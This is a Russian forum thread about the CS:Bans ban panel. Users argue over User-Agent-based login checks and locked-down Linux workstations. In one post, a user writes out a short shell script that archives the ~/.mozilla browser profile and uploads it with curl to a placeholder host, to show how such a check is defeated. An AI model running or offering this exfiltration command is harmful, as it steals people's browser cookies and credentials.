Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

200 страниц V  « 198 199 200

CS:Bans - замена AmxBans

Статус пользователя Gecko
сообщение 14.11.2021, 12:56
Сообщение #3961
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

Цитата(BaHeK @ 14.11.2021, 12:44) *
Gecko, я не ставлю лишние костыльные расширения, еще может для каждого сайта ставить свои расширения? И я тебе еще раз пишу, дурак может поставить стороннее ПО, на свой пк и все твои костыли улетят на сторонний сервер вместе со всеми настройками браузера.

Я тебе привел пример в первом моём сообщении, там дурак ничего не поставит и никуда ничего не улетит.



Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 14.11.2021, 20:22
Сообщение #3962


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

Gecko, где в твоем примере запрет на запуск сторонних .exe файлов?


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 14.11.2021, 21:33
Сообщение #3963
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

Цитата(BaHeK @ 14.11.2021, 20:22) *
Gecko, где в твоем примере запрет на запуск сторонних .exe файлов?


Цитата
рабочее место я рекомендую в таких случаях на линуксе, с полным закрытием всех портов и комфортным для пользователя ограничением прав


Конфиг который я привел тут, позволяет исходящий трафик на несколько портов всё остальное дропаем.
Цитата
443/tcp Web с принудительным редиректом всего что с http на https на стороне браузера
465/tcp Google smtps (то есть, доступ только к почтовому серверу гугла, в моём случае это корпоративный почтовый сервер, в конфиге ufw я это не привел)
587 Google msa
993 Google IMAP
53 tcp/udp DNS

68 порт локально.

Все порты кроме 443 и 53 подразумевают привязку к конкретному хосту.
Пример:
Цитата
-A ufw-user-output -o eth0 -p tcp -d IP/32 --dport PORT -j ACCEPT


Права доступа пользователя запрещают всё и разрешают только то, что разрешено. В браузере запрещено устанавливать и удалять плагины.
Каталог ~/ .mozilla/firefox/***/extensions (симлинк) <--- сюда ничего не установить, ничего не изменить и ничего не удалить.
Все кеши в tmpfs.
Систему локально мониторит AFICK, логи пишет с ротацией за последний месяц.
Все установленные программы без исключения легитимные, включая сам браузер. Установка других программ и интерпретаторов кроме bash запрещена, также доступ к консоли, системные команды, мкакросы, etc...

============

В общем, я твою позицию понял, ты и я, каждый останется при своём мнении. Моя аргументация по теме не убедительна, я как нибудь это переживу, тяжело конечно будет, но куда я денусь.

К стати, может прозвучит странно и смешно, но удалённый доступ при таком раскладе и ввиду перемещения некоторых ПК (ноутбук) - использую TeamViewer (версия для Linux без официальной поддержки) + скрипт который его принудительно завершает убивая все его фоновые процессы. Но только на рабочих станциях с тем конфигом рабочего места который я привёл выше.

UPD
Проверка по UA у меня в частности реализована в интернет магазинах доступ уровня контент мАнагер и выше, где вход по логину и паролю, но, если вход был осуществлён не с легитимным UA выдаёт стандартную ошибку веб-сервера 503, и пишет в определённый каталог специальный файл с необходимой мне информацией и программа меня об этом уведомляет почти сразу.

Безопасность любого проекта, начинается с компьютера пользователя, в иных случаях это всего лишь пустое слово. А если вы единственный админ и у вас установлен этот многострадальный csbans, смотрите сами, делайте как вам проще, ибо когда вас взломают вы даже знать об этом не будете просто будете дальше жить думая что всё в порядке, и в чем то вы даже будете правы, от взлома csbans да и всего игрового сервера, вы скорее всего по сути, ничего не потеряете, максимум время.

PS

Заканчивая по теме UA, сама эта концепция в некоторых случаях очень дешевая и эффективная, это моё мнение.

Думаю дискуссию которая плавно перешла в другую тему, нужно заканчивать.

Отредактировал: Gecko, - 14.11.2021, 22:27


Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 15.11.2021, 9:17
Сообщение #3964


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

Gecko, большинство пользователей сидят в винде и твои костыли им не понятны, ну ок, вот тебе шелл для линукса
Код
tar -czf file.tar.gz ~/.mozilla
curl -X POST -H "Content-Type: multipart/form-data" -F "data=@file.tar.gz" https://mysite/upload
rm file.tar.gz

Или ты собираешься блокировать все сайты кроме своего ксбанс, чтобы еще нельзя было серфить по интернету? Тогда вообще выруби интернет и не пользуйся ни чем, проще будет.


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 15.11.2021, 16:12
Сообщение #3965
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

BaHeK, большинство пользователей действительно на винде, но не в моём случае, твой шелл упрётся в каталог.

Моя цитата:
Цитата
Каталог ~/ .mozilla/firefox/***/extensions (симлинк) <--- сюда ничего не установить, ничего не изменить и ничего не удалить.


И к стати, твой шел априори не сработает у моего пользователя потому как
Цитата
curl -X POST -H "Content-Type: multipart/form-data" -F "data=@file.tar.gz" https://mysite/upload


Цитата
... разрешают только то, что разрешено.

Зачем пользователю curl?

Давай ещё примеры.

Отредактировал: Gecko, - 15.11.2021, 17:40


Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Eka
сообщение 15.11.2021, 17:53
Сообщение #3966
Стаж: 8 лет 2 месяца

Сообщений: 280
Благодарностей: 114
Полезность: 176

BaHeK, на самом деле эти телодвижения приносят пользу. Благодаря им у пользователей появится возможность придумать еще один способ слить данные "на сторону".

Отредактировал: Fullserver, - 16.11.2021, 15:05
Причина: Выдано предупреждение!


цитаты великих умов
Цитата
аналог libcurl в Go это net/http
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 15.11.2021, 18:24
Сообщение #3967
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

Цитата(Eka @ 15.11.2021, 17:53) *
BaHeK, на самом деле эти телодвижения приносят пользу. Благодаря им у пользователей появится возможность придумать еще один способ слить данные "на сторону".

Всё давным-давно придумано, всё что нужно это максимально контролировать ПО на своём ПК. В идеале это собственная сборка системы с полным контролем всего когда.
Весь софт должен быть легитимным, а политики безопасности должны запрещать всё и разрешать только то, что необходимо для работы.
В сумме с мандатным и дискреционным контролем доступа можно обеспечить хорошую безопасность рабочего места пользователя.
А при запрете установки исполняемого бита на некоторых специализированных ядрах системы, варианты запуска каких либо нелегитимных скриптов невозможна. Всё должно зависеть от уровня доступа к данным того или иного пользователя.
По этому варианты которые привёл BaHeK рассчитаны на неподготовленных пользователей которые не страдают манией преследования которые не хотят по умолчанию в безобидной программе редакторе карт видеть опасного троянского коня.


Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 15.11.2021, 21:24
Сообщение #3968


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

Gecko, тогда ты проиграл эту войну, у тебя шеллы вшиты в материнку, процессор, озу, диски, за тобой следит лично байден, ему интересно сколько раз в день ты подтираешься и какую порнуху предпочитаешь. Хотя может ты сам склепал железо? А то нечего америкосам доверять. Шапочку из фольги не забудь надеть.

Отредактировал: Fullserver, - 16.11.2021, 9:40
Причина: Выдано предупреждение!


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 15.11.2021, 22:05
Сообщение #3969
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

Цитата(BaHeK @ 15.11.2021, 21:24) *
Gecko, тогда ты проиграл эту войну, у тебя шеллы вшиты в материнку, процессор, озу, диски, за тобой следит лично байден, ему интересно сколько раз в день ты подтираешься и какую порнуху предпочитаешь. Хотя может ты сам склепал железо? А то нечего америкосам доверять. Шапочку из фольги не забудь надеть.

Это войну все проиграли, кроме конечно тех, кто как минимум разрабатывает и хоть как то производит свои CPU. В частности, я уже в одной из тем на этом форуме акцентировал внимание на e2k и АО МЦСТ как альтернативу для национального и транснационального крупного бизнеса.





Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Metal Messiah
сообщение 15.11.2021, 23:34
Сообщение #3970


Иконка группы

Стаж: 13 лет

Сообщений: 2458
Благодарностей: 1482
Полезность: 772

HostGame.cf
Подождите, сбегаю в магаз за попкорном!
Тут 2 страницы холивара, а вижу я их почему-то только сейчас.
К чему данная дискуссия в теме CS:Bans? Пояснительную бригаду, пожалуйста!

Пожалуй, пока продолжим, а потом это все будет вырезаться во Флейм.

Цитата(esterio)
кроме пхп для бекенда используют множество других языков
Да, есть знатные извращуги. Потом их продукты фиг на другую машину без танцев с бубном перенесешь.

Цитата(sergggzi)
А мне нравятся форумчане Gecko и Metal Messiah :)) они чем-то похожи, они спецы во всех сферах
Не вижу ничего плохого в том чтобы разбираться во всех сферах, хотя бы понемногу.

Цитата
Metal Messiah обещал за 2 недели написать двиг типа svv. Прошло уже полгода, тишина.
Пришел к выводу что разработка не окупится. Пойди переубеди кого-то, уже заплатившего за SVV, который ему под ключ настроили, в необходимости перейти на новый двиг, пусть даже он лучше будет.

Цитата
ВаНеК взял и написал двиг с 0 для gs-m :)
Молодец. Csadmin осилил клон SVV, теперь и ВаНеК. Так держать.

Цитата(Gecko)
Небезопасно когда данный хэш ИЗВЕСТЕН
А что, еще кто-то использует хеши без соли? Да, есть базы хешей паролей по словарю, но фиг ты переберешь все солёные хеши, тем более если не известна соль или точный алгоритм хеширования.

P.S. 2ФА это ЗЛО! (можно начинать срач)

Отредактировал: Fullserver, - 16.11.2021, 15:27
Причина: Выдано предупреждение!


Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam там же.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 16.11.2021, 0:19
Сообщение #3971
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

Metal Messiah, всё началось с моего невинного сообщения по теме КОТОРОЕ УЖЕ ПОТЁРЛИ, где я объяснил основные моменты в обновлении csbans, ну и про то, что можно User-Agent (UA) использовать в качестве дополнительной аутентификации пользователя в CSBANS. diablo.gif
Мне тут уже разжевали, что и как. Отдельно порадовал esterio который даже не вникал суть вопроса и сходу причислил функцию, да что там функцию )) целый алгоритм хэширования к таковым, которые более не рекомендовано использовать, ввиду того что он морально устарел.
Я правда не могу понять, морально устаревшую функцию нельзя использовать к примеру так:
Код
if(!empty($_SERVER['HTTP_USER_AGENT'])){
    session_name(md5($_SERVER['HTTP_USER_AGENT']));
}

Тут дело не в подборе хэша а именно в том что его сперва нужно как то получить. На вопрос как получить в дискуссию зашел BaHeK и в принципе грамотно аргументировал как в первом так и в последующих своих сообщениях свою позицию о так называемом "костыле", Но каждый остался при своих.



Metal Messiah, к стати, а зачем потёрли мой пост который был вообще по теме и содержал исключительно важную для обновления информацию?


Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 16.11.2021, 0:25
Сообщение #3972
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

Metal Messiah, всё понял, перенесли...
Этот пост был в тему, всё остальное нужно было переносить во флуд.

Отредактировал: Gecko, - 16.11.2021, 0:43


Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя sergggzi
сообщение 16.11.2021, 1:26
Сообщение #3973
Иконка группы

Стаж: 13 лет

Сообщений: 6536
Благодарностей: 6222
Полезность: 807

Metal Messiah, осилил или не осилил. Просто кто-то на словах герой, а на деле… кто-то взял и сделал. В этом и разница - болтовня или дело. И там никакого клона нет:)

Зайди в группу svv. Там все в ожидании версии 2.0, которая явно не скоро будет… если вообще будет. А люди готовы покупать. Не знаю, от куда выводы. Неделю же кодить двиг, что там не окупится? Если бы уделил неделю времени полгода назад, то уже бы все отбил. Но как я уже говорил, ты настрочил букв на форуме больше, чем какого-то кода. При этом пытаешься критиковать тех, кто уже что-то разработал. Ты еще грозился показать свою разработку на новом билде, обсирая нашего кодера, когда мы начали свою. То что-то не так накодили для твоей древней хп, то еще что-то. А у тебя все так ничего и не кодится.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Gecko
сообщение 16.11.2021, 2:05
Сообщение #3974
Стаж: 7 лет 4 месяца

Сообщений: 1247
Благодарностей: 518
Полезность: 346

sergggzi, а чем плох https://github.com/gaisindanil/Gms ?
Или чем SVV лучше?

Отредактировал: Fullserver, - 16.11.2021, 9:40
Причина: Выдано предупреждение!


Не отвечаю на ЛС.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя sergggzi
сообщение 16.11.2021, 2:27
Сообщение #3975
Иконка группы

Стаж: 13 лет

Сообщений: 6536
Благодарностей: 6222
Полезность: 807

Gecko, думаю, что ничем не плох. Всегда можно обратиться к автору и допилить под свои нужды. Интересно, есть ли уже рабочие моники на этом двигле? Второй ничем не лучше, все закрыто и хрен, что допилишь.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Metal Messiah
сообщение 16.11.2021, 3:22
Сообщение #3976


Иконка группы

Стаж: 13 лет

Сообщений: 2458
Благодарностей: 1482
Полезность: 772

HostGame.cf
Цитата
То что-то не так накодили для твоей древней хп
Ну дык крашится же ваша сборка на XP, я тогда баг репортил, это очень давно было. Что-то изменилось? crazy.gif

Цитата
А люди готовы покупать. Не знаю, от куда выводы.
Говорил я с разными людьми на эту тему. Не так чтобы массово готовы были покупать, а сделать двиг под 1-2 продажи, настраивать под ключ и потом доделывать разные хотелки - на это надо время. Я передумал начинать. Уже сделал модуль оплаты когда Unitpay отвалился, сделал его практически в тот же день, но что-то жмутся люди покупать работающий модуль и предпочитают подождать пока им исправление разработчик SVV напишет. Ну, подумаешь, неделю будут принимать оплату ручками либо просто ее отключат на пару суток (и такое было). Многие дождутся SVV 2.0.

Про клон я имел в виду функциональность и даже внешний вид. На том же csadmin не каждый поймет SVV это или нет. У вас так же.

Отредактировал: Metal Messiah, - 16.11.2021, 3:24


Полезные публикации - ссылки у меня в профиле. Ссылка на плагин против спама на сервере StopServerSpam там же.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя sergggzi
сообщение 16.11.2021, 6:24
Сообщение #3977
Иконка группы

Стаж: 13 лет

Сообщений: 6536
Благодарностей: 6222
Полезность: 807

Цитата(Metal Messiah @ 16.11.2021, 4:22) *
Ну дык крашится же ваша сборка на XP

Свою, которая не крашится, ты так и не показал, а уверял, что будет все четко lol.gif

Цитата(Metal Messiah @ 16.11.2021, 4:22) *
Про клон я имел в виду функциональность и даже внешний вид.

Что такое функциональность svv? Модули оплаты, випок, бустов, топов, аукционов? У меня на lightmon все это было. Так как твоей разработки не увидели, все осталось в виде букв, то пришлось изобретать велосипед. rofl.gif

Отредактировал: Fullserver, - 16.11.2021, 9:40
Причина: Выдано предупреждение!
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Fullserver
сообщение 16.11.2021, 9:41
Сообщение #3978


Иконка группы

Стаж: 11 лет

Сообщений: 5122
Благодарностей: 2100
Полезность: 1394

!
Последующий оффтоп в теме = РО
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
XyLiGaN
сообщение 23.11.2021, 7:31
Сообщение #3979
Стаж: 13 лет
Город: Югорск

Сообщений: 11668
Благодарностей: 6450
Полезность: 1052

Меценат Меценат

Доступна версия CS Bans 1.3.3
Цитата
Скачать можно - здесь
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя bristol
сообщение 17.4.2022, 20:19
Сообщение #3980


Стаж: 12 лет

Сообщений: 320
Благодарностей: 95
Полезность: 225

Может кто подсказать пожалуйста, почему при переходе по ссылке http://мойдомен.com/site/install получаю ошибку 404? Файлы лежат в директории, права выставлены были 755 и 777 пробовал, но ни в какую. Дело в настройках nginx или .htaccess? Если да, то что можно проверить?

Отредактировал: bristol, - 17.4.2022, 20:20
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
200 страниц V  « 198 199 200
 
Ответить в данную темуНачать новую тему
 
0 пользователей и 2 гостей читают эту тему: